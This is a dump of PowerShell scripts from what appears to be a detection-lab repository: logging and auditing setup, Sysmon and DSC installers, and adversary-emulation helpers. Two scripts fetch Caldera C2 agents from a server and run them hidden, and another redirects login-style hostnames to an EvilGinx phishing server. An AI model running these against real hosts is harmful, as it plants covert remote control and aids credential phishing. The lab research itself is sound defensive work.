    if ($arrService.Status -eq 'Running')
    {
        Write-Host "$ServiceName Service is now Running"
    }
}
--------------------------------------------------------------------------------
/resources/scripts/powershell/auditing/Enable-PowerShell-Logging.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Enable PowerShell Logging
# One CSV row per registry value: script block logging (with invocation
# logging) and module logging for every module ("*" under ModuleNames).
$regConfig = @"
regKey,name,value,type
"HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging","EnableScriptBlockLogging",1,"DWORD"
"HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging","EnableScriptBlockInvocationLogging",1,"DWORD"
"HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging","EnableModuleLogging",1,"DWORD"
"HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames",*,*,"String"
"@

Write-host "Setting up PowerShell registry settings.."
$entries = $regConfig | ConvertFrom-Csv
foreach ($entry in $entries)
{
    # The key has to exist before New-ItemProperty can write a value under it
    if (-not (Test-Path $entry.regKey))
    {
        Write-Host $entry.regKey " does not exist.."
        New-Item $entry.regKey -Force
    }
    Write-Host "Setting " $entry.regKey
    New-ItemProperty -Path $entry.regKey -Name $entry.name -Value $entry.value -PropertyType $entry.type -force
}
--------------------------------------------------------------------------------
/resources/scripts/powershell/auditing/Set-AuditSAMRemoteCalls.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Reference:
# https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-clients-allowed-to-make-remote-sam-calls

# Remote SAM call restriction. The SDDL allows only Administrators (BA); with
# RestrictRemoteSamAuditOnlyMode = 1 other callers are audited rather than
# blocked, and a throttling window of 0 presumably disables collapsing of the
# audit events — confirm against the reference above before enforcing.
$regConfig = @"
regKey,name,value,type
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa","restrictremotesam","O:BAG:BAD:(A;;RC;;;BA)","String"
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa","RestrictRemoteSamAuditOnlyMode",1,"DWord"
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa","RestrictRemoteSamEventThrottlingWindow",0,"DWord"
"@

Write-host "Setting up Registry keys for additional settings.."
$entries = $regConfig | ConvertFrom-Csv
foreach ($entry in $entries)
{
    # The key has to exist before New-ItemProperty can write a value under it
    if (-not (Test-Path $entry.regKey))
    {
        Write-Host $entry.regKey " does not exist.."
        New-Item $entry.regKey -Force
    }
    Write-Host "Setting " $entry.regKey
    New-ItemProperty -Path $entry.regKey -Name $entry.name -Value $entry.value -PropertyType $entry.type -force
}
--------------------------------------------------------------------------------
/resources/scripts/powershell/azure-active-directory/Get-DeviceCode.ps1:
--------------------------------------------------------------------------------
function Get-DeviceCode {
<#
.SYNOPSIS
Requests a device code from the Microsoft identity platform to start a device code authentication flow.

Author: Roberto Rodriguez (@Cyb3rWard0g)
License: MIT
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION
Get-DeviceCode posts a device authorization request for the given Azure AD application to the
v2.0 devicecode endpoint and returns the endpoint's response (device_code, user_code, verification
URI, polling interval). It throws when the response carries no device_code.

.PARAMETER ClientId
The Application (client) ID assigned to the Azure AD application.

.PARAMETER TenantId
Tenant segment of the endpoint URL: common, consumers, organizations, or a directory tenant as a
GUID or friendly name. Defaults to organizations when omitted.

.PARAMETER Scope
A space-separated list of scopes that you want the user to consent to.

.LINK
https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-device-code#:~:text=The%20device%20code%20flow%20is%20a%20polling%20protocol,hasn%27t%20finished%20authenticating%2C%20but%20hasn%27t%20canceled%20the%20flow.

#>

    [cmdletbinding()]
    Param(
        [Parameter(Mandatory = $true)]
        [String]$ClientId,
        [Parameter(Mandatory = $false)]
        [string]$TenantId,
        [Parameter(Mandatory = $true)]
        [string]$Scope
    )
    # Force TLS 1.2
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

    # Device authorization request against the tenant, defaulting to "organizations"
    $tenant = if ([string]::IsNullOrEmpty($TenantId)) { 'organizations' } else { $TenantId }

    $requestArgs = @{
        Method  = 'Post'
        Uri     = "https://login.microsoftonline.com/$tenant/oauth2/v2.0/devicecode"
        Headers = @{ 'Content-Type' = 'application/x-www-form-urlencoded' }
        Body    = @{ client_id = $ClientId; scope = $Scope }
    }
    $response = Invoke-RestMethod @requestArgs

    # Process authorization request: no device_code means no flow was started
    if (-not $response.device_code)
    {
        throw "Device Code Flow failed"
    }
    $response
}
--------------------------------------------------------------------------------
/resources/scripts/powershell/c2/Invoke-Manx.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Fetches the Caldera "manx" agent from the lab C2 server and starts it on this host.
#   -C2IPAddress : address of the Caldera server (HTTP on 8888, TCP contact on 7010 —
#                  the ports the caldera compose file in this repo publishes)
[CmdletBinding()]
param(
    [Parameter(Mandatory=$true)]
    [string]$C2IPAddress
)

# "ignore" only exists on PowerShell 3+; older hosts fall back to SilentlyContinue
if ($host.Version.Major -ge 3)
{
    $ErrAction= "ignore"
}
else
{
    $ErrAction= "SilentlyContinue"
}
$server="http://$C2IPAddress`:8888"
$socket="$C2IPAddress`:7010"
# assigned but unused: the Start-Process argument list below hard-codes "-contact tcp"
$contact="tcp"
$url="$server/file/download"
# The platform/file request headers select which agent build the server returns
$wc=New-Object System.Net.WebClient
$wc.Headers.add("platform","windows")
$wc.Headers.add("file","manx.go")
# Plain-HTTP download with no integrity check on the returned binary
$data=$wc.DownloadData($url)
# Binary name comes from the Content-Disposition header ("filename=" with quotes stripped)
$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")
# Replace any running copy before writing the new binary
Get-Process | ? {$_.Path -like "C:\Users\Public\$name.exe"} | stop-process -f -ea $ErrAction
rm -force "C:\Users\Public\$name.exe" -ea $ErrAction;([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data)) | Out-Null

# The file write into C:\Users\Public and the hidden-window process start are the
# host-side events to expect in telemetry when this lab agent is deployed.
Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-socket $socket -http $server -contact tcp" -WindowStyle hidden
--------------------------------------------------------------------------------
/resources/scripts/powershell/c2/invoke-sandcat.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Fetches the Caldera "sandcat" agent from the lab C2 server and starts it on this
# host as a member of the "red" group.
#   -C2IPAddress : address of the Caldera server (HTTP on 8888)
[CmdletBinding()]
param(
    [Parameter(Mandatory=$true)]
    [string]$C2IPAddress
)

$server="http://$C2IPAddress`:8888"
$url="$server/file/download"
# The platform/file request headers select which agent build the server returns
$wc=New-Object System.Net.WebClient
$wc.Headers.add("platform","windows")
$wc.Headers.add("file","sandcat.go")
# Plain-HTTP download with no integrity check on the returned binary
$data=$wc.DownloadData($url)
# Binary name comes from the Content-Disposition header ("filename=" with quotes stripped)
$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")
# Replace any running copy before writing the new binary (matched via loaded module paths here,
# unlike Invoke-Manx.ps1 which matches on the process path)
get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f
rm -force "C:\Users\Public\$name.exe" -ea ignore;[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null

# The file write into C:\Users\Public and the hidden-window process start are the
# host-side events to expect in telemetry when this lab agent is deployed.
Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group red" -WindowStyle hidden
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/active-directory/Create-AD.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/active-directory/Create-AD.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/active-directory/Install-ADFS.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/active-directory/Install-ADFS.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/active-directory/Join-Domain.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/active-directory/Join-Domain.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/active-directory/Prepare-ADFS.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/active-directory/Prepare-ADFS.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Enable-TLS12.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/misc/Enable-TLS12.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Import-PfxCert.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez @Cyb3rWard0g
# License: GPLv3
# DSC configuration that imports a PFX file into a certificate store on localhost.
#   PfxCertPath  - path to the .pfx file; resolved with Get-ChildItem, so a wildcard
#                  matching several files would hand an array to -FilePath — TODO confirm
#                  callers always pass exactly one file
#   Location     - CurrentUser or LocalMachine store root (default LocalMachine)
#   Store        - store name under that root (default My)
#   Exportable   - whether the imported private key may be exported again; defaults
#                  to $true, so pass $false for keys that should stay in the store
#   PfxCertCreds - credential whose Password is the PFX password
configuration Import-PfxCert
{
    param
    (
        [Parameter()]
        [System.String]$PfxCertPath,

        [Parameter()]
        [ValidateSet('CurrentUser', 'LocalMachine')]
        [System.String]$Location = 'LocalMachine',

        [Parameter()]
        [ValidateNotNullOrEmpty()]
        [System.String]$Store = 'My',

        [Parameter()]
        [System.Boolean]$Exportable = $true,

        [Parameter()]
        [System.Management.Automation.PSCredential]$PfxCertCreds
    )

    Import-DscResource -ModuleName xPSDesiredStateConfiguration

    Node localhost
    {
        # ApplyOnly: the LCM applies this once and does not re-check it afterwards
        LocalConfigurationManager
        {
            ActionAfterReboot = 'ContinueConfiguration'
            ConfigurationMode = 'ApplyOnly'
            RebootNodeIfNeeded = $true
        }

        xScript ImportPFX
        {
            SetScript =
            {
                $certFilepath = Get-ChildItem -Path $using:pfxCertPath
                # e.g. Cert:\LocalMachine\My
                $certStore = 'Cert:' | Join-Path -ChildPath $using:Location | Join-Path -ChildPath $using:Store

                # NOTE(review): "$using:PfxCertCreds.Password" relies on member access
                # after a $using: variable being supported by the host's PowerShell/DSC
                # version — confirm, or bind the password to a plain variable first
                if ($using:Exportable -eq $True)
                {
                    Import-PfxCertificate -Exportable -CertStoreLocation $certStore -FilePath $certFilepath.FullName -Password $using:PfxCertCreds.Password
                }
                else
                {
                    Import-PfxCertificate -CertStoreLocation $certStore -FilePath $certFilepath.FullName -Password $using:PfxCertCreds.Password
                }
            }
            GetScript =
            {
                # This block must return a hashtable. The hashtable must only contain one key Result and the value must be of type String.
                return @{ "Result" = "false" }
            }
            TestScript =
            {
                # If it returns $false, the SetScript block will run. If it returns $true, the SetScript block will not run.
                # Always $false here: the import is unconditionally applied whenever the configuration runs.
                return $false
            }
        }
    }
}
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Import-PfxCert.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/misc/Import-PfxCert.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Install-AADConnect.ps1:
--------------------------------------------------------------------------------
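# Author: Roberto Rodriguez @Cyb3rWard0g
# License: GPLv3

# DSC configuration that downloads the Azure AD Connect MSI, installs it silently,
# reboots when the installer asks for it, and makes sure ADWS is running afterwards.
configuration Install-AADConnect {
    Import-DscResource -ModuleName xPSDesiredStateConfiguration, ComputerManagementDsc

    Node localhost
    {
        # ApplyOnly: the LCM applies this once and does not re-check it afterwards
        LocalConfigurationManager
        {
            ConfigurationMode = 'ApplyOnly'
            RebootNodeIfNeeded = $true
        }

        # ***** Download AADConnect *****
        # Fixed Microsoft download URL; nothing here verifies the MSI beyond the TLS connection.
        xRemoteFile DownloadAADConnect {
            DestinationPath = "C:\ProgramData\AzureADConnect.msi"
            Uri = "https://download.microsoft.com/download/B/0/0/B00291D0-5A83-4DE7-86F5-980BC00DE05A/AzureADConnect.msi"
        }

        # ***** Install AADConnect *****
        xScript InstallAADConnect
        {
            # reference: https://github.com/pthoor/AzureARMTemplates/blob/ddd09734a3817e459d3dbfb41fc96c9b011e0205/ADFS%20Lab/DSC/adDSC/adDSCConfiguration.ps1
            SetScript = {
                $exe="$env:SystemRoot\system32\msiexec.exe"
                $MSIPath = "C:\ProgramData\AzureADConnect.msi"

                # Invoke msiexec directly with the call operator instead of building a
                # command string for Invoke-Expression; the arguments are unchanged.
                # (/qn and /passive are both UI switches and msiexec honours only one of
                # them — confirm which is intended.)
                & $exe /i $MSIPath /qn /passive /forcerestart
            }
            GetScript =
            {
                # This block must return a hashtable. The hashtable must only contain one key Result and the value must be of type String.
                return @{ "Result" = "false" }
            }
            TestScript =
            {
                # If it returns $false, the SetScript block will run. If it returns $true, the SetScript block will not run.
                # Always $false here: the install runs unconditionally whenever the configuration is applied.
                return $false
            }
            DependsOn = "[xRemoteFile]DownloadAADConnect"
        }

        # Reboot once the installer has flagged one as pending
        PendingReboot RebootOnSignalFromAADConnect
        {
            Name = 'RebootOnSignalFromAADConnect'
            DependsOn = "[xScript]InstallAADConnect"
        }

        # Resource label corrected from "AWDS" to match the service it manages;
        # nothing else in the configuration references this label.
        xService ADWS
        {
            Name = "ADWS"
            State = "Running"
            DependsOn = '[PendingReboot]RebootOnSignalFromAADConnect'
        }
    }
}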
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Install-AADConnect.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/misc/Install-AADConnect.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Install-HyperV.ps1:
--------------------------------------------------------------------------------
# Installs the Hyper-V, DHCP and Remote Access roles plus their RSAT tools on the
# local node, letting the LCM reboot and resume when a role requires it.
Configuration Install-HyperV {

    Import-DscResource -ModuleName PsDesiredStateConfiguration

    Node "localhost" {

        LocalConfigurationManager {
            RebootNodeIfNeeded = $true
            ActionAfterReboot  = 'ContinueConfiguration'
        }

        # One WindowsFeature resource per feature; the feature name doubles as the resource instance name.
        $features = @(
            'Hyper-V',
            'DHCP',
            'RemoteAccess',
            'Routing',
            'RSAT-Hyper-V-Tools',
            'RSAT-DHCP',
            'RSAT-RemoteAccess'
        )
        foreach ($feature in $features) {
            WindowsFeature $feature {
                Name   = $feature
                Ensure = "Present"
            }
        }
    }
}
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/misc/Install-HyperV.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/misc/Install-HyperV.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/ms-exchange/Install-MSExchange.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/ms-exchange/Install-MSExchange.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/ms-exchange/PostInstall-MSExchange.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/ms-exchange/PostInstall-MSExchange.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/ms-exchange/Prepare-MSExchange.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/ms-exchange/Prepare-MSExchange.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/ms-exchange/PrepareAD-MSExchange.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/ms-exchange/PrepareAD-MSExchange.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/dsc/software/Install-Sysmon.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/scripts/powershell/dsc/software/Install-Sysmon.zip
--------------------------------------------------------------------------------
/resources/scripts/powershell/endpoint-software/Install-BadBlood.ps1:
--------------------------------------------------------------------------------
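# Author: Roberto Rodriguez (@Cyb3rWard0g)

# Prepares a lab host for BadBlood: installs the AD PowerShell module, Chocolatey
# and git, then clones the BadBlood repository to C:\ProgramData\badblood.

# The other scripts in this folder pin TLS 1.2 before touching the network; chocolatey.org
# and GitHub are expected to require it, so do the same here.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

# Install Active Directory Module for Windows PowerShell
Write-Host "Installing Active Directory module for Windows PowerShell"

Import-Module ServerManager
Add-WindowsFeature -Name "RSAT-AD-PowerShell" -IncludeAllSubFeature

# Installing Chocolatey
write-host "Installing Chocolatey.."

Set-ExecutionPolicy Bypass -Scope Process -Force
# NOTE(review): this is the vendor-documented bootstrap, but it runs a remotely fetched
# script without verification; pin to a reviewed copy or check a hash outside the lab.
Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
# Makes every later "choco install" non-interactive.
choco feature enable -n allowGlobalConfirmation

write-host "Installing choco packages.."
choco install git

[string]$PathToGit = "C:\Program Files\Git\bin\git.exe"
# Fail with a clear message if the git package did not land at the expected path.
if (!(Test-Path $PathToGit)) { Write-Error "git.exe not found at $PathToGit" -ErrorAction Stop }

[Array]$Arguments = "clone", "https://github.com/davidprowe/badblood.git", "C:\ProgramData\badblood"
& $PathToGit $Arguments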
--------------------------------------------------------------------------------
/resources/scripts/powershell/endpoint-software/Install-JonMon.ps1:
--------------------------------------------------------------------------------
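# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:
# https://copdips.com/2019/12/Using-Powershell-to-retrieve-latest-package-url-from-github-releases.html
# https://stackoverflow.com/a/25127597
# https://github.com/jsecurity101/JonMon/wiki#installation

# Downloads every asset of the newest JonMon GitHub release to C:\ProgramData,
# unpacks the zip asset and installs the JonMon service from the extracted folder.

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# DNS sanity checks; their output stays in the transcript to help troubleshoot failed downloads.
Resolve-DnsName github.com
Resolve-DnsName raw.githubusercontent.com

write-host "[+] Getting latest versions from JonMon GitHub project..."
$releases = Invoke-RestMethod -Uri 'https://api.github.com/repos/jsecurity101/JonMon/releases'
# The releases endpoint lists newest first; index 0 is the most recent release (pre-releases included).
$latest = $releases[0]
$assets = $latest.assets

write-host "[+] JonMon Release Name: $($latest.name)"

# Initializing Web Client
$wc = new-object System.Net.WebClient

# Folder the installer is run from; set once a zip asset has been handled.
$JonMonFolder = $null

# Downloading Assets
foreach ($asset in $assets){
    $downloadUrl = $asset.browser_download_url
    $OutputFile = Split-Path $downloadUrl -Leaf
    $File = "C:\ProgramData\$OutputFile"
    # Skip the download when the file is already present. The previous version used
    # "return" here, which ends the whole script on the first cached asset and never
    # reaches the install step below.
    if (Test-Path $File) {
        Write-host " [!] $File already exist"
    }
    else {
        write-Host "[+] Downloading" $asset.name "From" $downloadUrl
        # NOTE(review): assets are not hash- or signature-checked before being extracted and run.
        $wc.DownloadFile($downloadUrl, $File)
        # If for some reason, a file does not exists, STOP
        if (!(Test-Path $File)) { Write-Error "$File does not exist" -ErrorAction Stop }
    }
    # Decompress if it is zip file
    if ($File.ToLower().EndsWith(".zip"))
    {
        $UnpackName = (Get-Item $File).Basename
        $JonMonFolder = "C:\ProgramData\$UnpackName"
        # Only unpack when the folder is missing so a re-run does not fail on an existing extraction.
        if (!(Test-Path $JonMonFolder)) {
            write-Host " [+] Decompressing $OutputFile .."
            expand-archive -path $File -DestinationPath $JonMonFolder
        }
        if (!(Test-Path $JonMonFolder)) { Write-Error "$File was not decompressed successfully" -ErrorAction Stop }
    }
}

if (!$JonMonFolder) { Write-Error "No zip asset found in release $($latest.name)" -ErrorAction Stop }

# Installing JonMon
$JonMonLocation = Join-Path $JonMonFolder "JonMon"

write-Host "[+] Setting location to $JonMonLocation..."
Set-Location $JonMonLocation

write-Host "[+] Installing JonMon..."
& $JonMonLocation\JonMon-Service.exe -i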
--------------------------------------------------------------------------------
/resources/scripts/powershell/endpoint-software/Install-PowerAutomate.ps1:
--------------------------------------------------------------------------------
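# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:
# https://learn.microsoft.com/en-us/power-automate/desktop-flows/install-silently
# https://learn.microsoft.com/en-us/microsoft-edge/extensions-chromium/developer-guide/alternate-distribution-options#use-the-windows-registry-windows-only
# https://learn.microsoft.com/en-us/power-automate/desktop-flows/machines-silent-registration
# https://learn.microsoft.com/en-us/power-platform/admin/manage-application-users#create-an-application-user

# Downloads the Power Automate for desktop installer via its fwlink, installs it
# silently, and force-installs the Power Automate browser extension in Edge via policy.

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

write-host "[+] Downloading Power Automate for desktop.."
$Url = "https://go.microsoft.com/fwlink/?linkid=2102613"

# Initializing Web Client
$wc = new-object System.Net.WebClient

# Follow the fwlink redirect once to learn the real installer file name.
$request = [System.Net.WebRequest]::Create($Url)
$response = $request.GetResponse()
try {
    $ResolvedUri = $response.ResponseUri
    $OutputFile = [System.IO.Path]::GetFileName($ResolvedUri)
}
finally {
    # Release the connection even if the file name could not be derived.
    $response.Close()
}
$File = "C:\ProgramData\$OutputFile"

# Check to see if file already exists
if (Test-Path $File) { Write-host " [!] $File already exist"; return }
# Download if it does not exists
write-host "[+] Downloading installer from $ResolvedUri.."
$wc.DownloadFile($Url, $File)
# If for some reason, a file does not exists, STOP
if (!(Test-Path $File)) { Write-Error "$File does not exist" -ErrorAction Stop }

write-host "[*] Installing Power Automate for Desktop.."
& $File -Silent -Install -ACCEPTEULA

# Set up MS Edge extensions registry
# ExtensionInstallForcelist is a machine-wide Edge policy; the value is "<extension id>;<update url>"
# (second reference above), so Edge installs the extension without user interaction.
$RegistryKey = "HKLM:\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist"
if(!(Test-Path $RegistryKey)){
    Write-Host "[+] Creating $RegistryKey .."
    New-Item $RegistryKey -Force
}
Write-Host "[+] Setting up property to install and enable Microsoft Power Automate extension.."
New-ItemProperty -Path $RegistryKey -Name "1" -Value "kagpabjoboikccfdghpdlaaopmgpgfdc;https://edge.microsoft.com/extensionwebstorebase/v1/crx" -PropertyType "String" -force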
--------------------------------------------------------------------------------
/resources/scripts/powershell/endpoint-software/Install-Sysmon.ps1:
--------------------------------------------------------------------------------
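# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:
# https://medium.com/@cosmin.ciobanu/enhanced-endpoint-detection-using-sysmon-and-wef-3b65d491ff95

# Downloads Sysmon and a configuration file, installs the driver/service with that
# configuration, opens the Sysmon event channel to log readers and waits for the
# service to run.
[CmdletBinding()]
param (
    [string]$SysmonConfigUrl = "https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/configs/sysmon/sysmon.xml"
)

write-host "[+] Processing Sysmon Installation.."

$URL = "https://download.sysinternals.com/files/Sysmon.zip"
# DNS sanity checks; their output stays in the transcript to help troubleshoot failed downloads.
Resolve-DnsName download.sysinternals.com
Resolve-DnsName github.com
Resolve-DnsName raw.githubusercontent.com

$OutputFile = Split-Path $Url -leaf
$File = "C:\ProgramData\$OutputFile"
# Derive the extraction folder and binary path up front so they are defined even when
# the zip branch below is skipped (previously $SysmonBinary only existed inside it).
$UnpackName   = [System.IO.Path]::GetFileNameWithoutExtension($OutputFile)
$SysmonFolder = "C:\ProgramData\$UnpackName"
$SysmonBinary = "$SysmonFolder\Sysmon.exe"

# Download File
write-Host "[+] Downloading $OutputFile .."
$wc = new-object System.Net.WebClient
$wc.DownloadFile($Url, $File)
if (!(Test-Path $File)) { Write-Error "File $File does not exist" -ErrorAction Stop }

# Decompress if it is zip file
if ($File.ToLower().EndsWith(".zip"))
{
    # Unzip file; -Force lets the script be re-run over a previous extraction.
    write-Host " [+] Decompressing $OutputFile .."
    expand-archive -path $File -DestinationPath $SysmonFolder -Force
    if (!(Test-Path $SysmonBinary)) { Write-Error "$File was not decompressed successfully" -ErrorAction Stop }
}

# Downloading Sysmon Configuration
write-Host "[+] Downloading Sysmon config.."
$SysmonFile = "C:\ProgramData\sysmon.xml"
$wc.DownloadFile($SysmonConfigUrl, $SysmonFile)
if (!(Test-Path $SysmonFile)) { Write-Error "File $SysmonFile does not exist" -ErrorAction Stop }

# Installing Sysmon
write-Host "[+] Installing Sysmon.."
& $SysmonBinary -i $SysmonFile -accepteula

write-Host "[+] Setting Sysmon to start automatically.."
& sc.exe config Sysmon start= auto

# Setting Sysmon Channel Access permissions
# SDDL: SYSTEM and Administrators keep their usual rights; Event Log Readers (S-1-5-32-573)
# and Network Service get read (0x1) so log collection/forwarding accounts can read the channel.
write-Host "[+] Setting up Channel Access permissions for Microsoft-Windows-Sysmon/Operational "
wevtutil set-log Microsoft-Windows-Sysmon/Operational /ca:'O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)'
#New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational" -Name "ChannelAccess" -PropertyType String -Value "O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)" -Force

write-Host " [*] Verifying if Sysmon is running.."
$s = Get-Service -Name Sysmon
# ServiceController caches Status: without Refresh() the loop would never see the service
# come up after Start-Service and spin forever. Retries are bounded for the same reason.
$attempts = 0
while ($s.Status -ne 'Running' -and $attempts -lt 10) {
    Start-Service Sysmon
    Start-Sleep 3
    $s.Refresh()
    $attempts++
}
if ($s.Status -ne 'Running') { Write-Error "Sysmon service did not reach the Running state" -ErrorAction Stop }
Start-Sleep 5
write-Host " [*] Sysmon is running.."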
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Add-EvilGinx-Hosts.ps1:
--------------------------------------------------------------------------------
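# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Adds one hosts-file entry per prefix in $prefixStrings, each resolving
# "<prefix>.<ServerDNSFQDN>" to $ServerAddresses, so lab clients reach the
# lab server by those names.
[CmdletBinding()]
param (
    [Parameter(Mandatory=$true)]
    [string]$ServerAddresses,

    [Parameter(Mandatory=$true)]
    [string]$ServerDNSFQDN
)

$ErrorActionPreference = "Stop"

$hostsFilePath = "$($Env:WinDir)\system32\Drivers\etc\hosts"
$prefixStrings = @("www","login","example","subdomainhere","api","github","fls-na","images-na","outlook","account")

# Read the current file once so a re-run does not append duplicate lines.
$existingEntries = @()
if (Test-Path $hostsFilePath) { $existingEntries = Get-Content -Path $hostsFilePath }

Foreach ($string in $prefixStrings){
    $hostname = $string, $ServerDNSFQDN -join "."
    $hostEntry = "$ServerAddresses $hostname"

    if ($existingEntries -contains $hostEntry) {
        Write-Host "[!] $hostEntry already present in $hostsFilePath, skipping.."
        continue
    }
    Write-Host "[+] Adding $hostEntry to $hostsFilePath.."
    Add-Content -Value $hostEntry -Path $hostsFilePath
}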
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Configure-PSRemoting.ps1:
--------------------------------------------------------------------------------
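# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Enables WinRM/PowerShell remoting and adds an HTTPS (5986) listener backed by a
# self-signed certificate for the local computer name.

# Set up PSRemoting
# https://docs.microsoft.com/windows/win32/winrm/installation-and-configuration-for-windows-remote-management.
$ServiceName = 'WinRM'
$arrService = Get-Service -Name $ServiceName

if ($arrService.Status -eq 'Running')
{
    Write-Host "$ServiceName Service is now Running"
}
else
{
    Write-host 'Enabling WinRM..'
    winrm quickconfig -q
    <#The winrm quickconfig command (or the abbreviated version winrm qc) performs these operations.
    - Starts the WinRM service, and sets the service startup type to auto-start.
    - Configures a listener for the ports that send and receive WS-Management protocol messages using either HTTP or HTTPS on any IP address.
    - Defines ICF exceptions for the WinRM service, and opens the ports for HTTP and HTTPS.#>
}
# Enable PowerShell remoting.
Enable-PSRemoting -Force
# Create firewall rule for WinRM. The default HTTPS port is 5986.
# NOTE(review): -Profile "Any" exposes 5986 on every network profile; restrict -RemoteAddress
# to the lab subnet if this host is ever reachable from elsewhere.
New-NetFirewallRule -Name "WinRM HTTPS" -DisplayName "WinRM HTTPS" -Enabled True -Profile "Any" -Action "Allow" -Direction "Inbound" -LocalPort 5986 -Protocol "TCP"
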